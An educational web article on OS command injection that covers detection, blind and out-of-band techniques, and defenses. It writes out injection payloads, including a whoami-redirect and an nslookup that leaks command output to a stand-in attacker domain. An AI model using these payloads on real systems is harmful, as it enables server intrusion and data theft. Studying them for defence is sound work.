BestHub
search
Sign in
Information Security 10 min read

OS Command Injection

This article explains what OS command injection is, how it can be detected and exploited on both Linux and Windows systems, demonstrates common payloads and techniques—including blind and out‑of‑band methods—and provides best‑practice defenses to prevent such vulnerabilities.

System Architect Go
System Architect Go
System Architect Go
OS Command Injection

OS Command Injection

In this section we explain what OS command injection is, describe how to detect and exploit the vulnerability, list useful commands and techniques for different operating systems, and summarize how to prevent OS command injection.

What is OS Command Injection

OS command injection (also called shell injection) is a web security flaw that allows an attacker to execute arbitrary operating‑system commands on the server hosting the application, potentially causing severe damage to the application, its data, and other systems in the infrastructure.

Arbitrary Command Execution

Assume a shopping application lets a user check product stock via a URL such as:

https://insecure-website.com/stockStatus?productID=381&storeID=29

The application queries legacy systems by invoking a shell command:

stockreport.pl 381 29

If the application does not defend against OS command injection, an attacker can supply input like:

& echo aiwefwlguh &

When used as the productID parameter, the executed command becomes:

stockreport.pl & echo aiwefwlguh & 29

The echo command simply prints the supplied string, while the & symbol is a shell command separator, causing three separate commands to run. The resulting output is:

Error - productID was not provided
aiwefwlguh
29: command not found

This demonstrates how the original command fails, the injected echo succeeds, and the trailing parameter is interpreted as a command.

Common Commands

When identifying an OS command injection, initial commands to gather system information are useful. Below is a summary of common commands on Linux and Windows:

Command Meaning

Linux

Windows

Show current user

whoami

whoami

Show OS information

uname -a

ver

Show network configuration

ifconfig

ipconfig /all

Show network connections

netstat -an

netstat -an

Show running processes

ps -ef

tasklist

Invisible OS Command Injection

Many OS command injection flaws are invisible, meaning the application does not return command output in the HTTP response. They can still be exploited using alternative techniques.

For example, a feedback form that sends an email via the mail command does not expose the command’s output, so an echo payload would be ineffective. Instead, other detection methods are needed.

Timing‑Based Detection

Inject a command that induces a delay and measure response time. Using ping is effective because it can be instructed to run for a specific duration:

& ping -c 10 127.0.0.1 &

This command will ping for about 10 seconds.

Redirecting Output

Redirect the output of an injected command to a web‑accessible directory. If the application serves files from /var/www/static , an attacker can send:

& whoami > /var/www/static/whoami.txt &

The > symbol redirects the result of whoami to whoami.txt , which can then be retrieved via a browser at https://vulnerable-website.com/whoami.txt .

Using OAST (Out‑of‑Band Application Security Testing)

With OAST, an attacker controls an external system and injects a command that contacts that system, allowing detection of successful injection. Example payload:

& nslookup kgji2ohoyw.web-attacker.com &

The nslookup command performs a DNS lookup for a domain the attacker controls; observing the lookup confirms execution.

Another technique embeds the result of a command in the DNS query:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

This causes a lookup such as wwwuser.kgji2ohoyw.web-attacker.com , revealing the output.

Methods for Injecting OS Commands

Various shell meta‑characters can be used to perform OS command injection. Common command separators that work on both Windows and Unix include:

&

&&

|

||

Unix‑only separators include:

;

newline ( 0x0a or \n )

Unix shells also allow backticks ( ` ) and the dollar sign ( $ ) for command substitution.

Different meta‑characters behave slightly differently, affecting whether they can retrieve command output or only work for blind exploits.

If the attacker’s input appears inside quoted strings, they must first terminate the quote using " or \' before injecting additional commands.

Defending Against OS Command Injection

The most effective mitigation is to avoid invoking OS commands from application code altogether, preferring safer platform APIs.

If calling OS commands with user input is unavoidable, strict input validation is required, such as:

Whitelist validation against allowed values.

Ensuring the input is numeric when appropriate.

Allowing only alphanumeric characters without special syntax or spaces.

Do not rely on escaping shell meta‑characters; this approach is error‑prone and can be bypassed by skilled attackers.

Web Securityvulnerability detectionOS command injectionDefense Techniquesshell injection
System Architect Go
Written by

System Architect Go

Programming, architecture, application development, message queues, middleware, databases, containerization, big data, image processing, machine learning, AI, personal growth.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment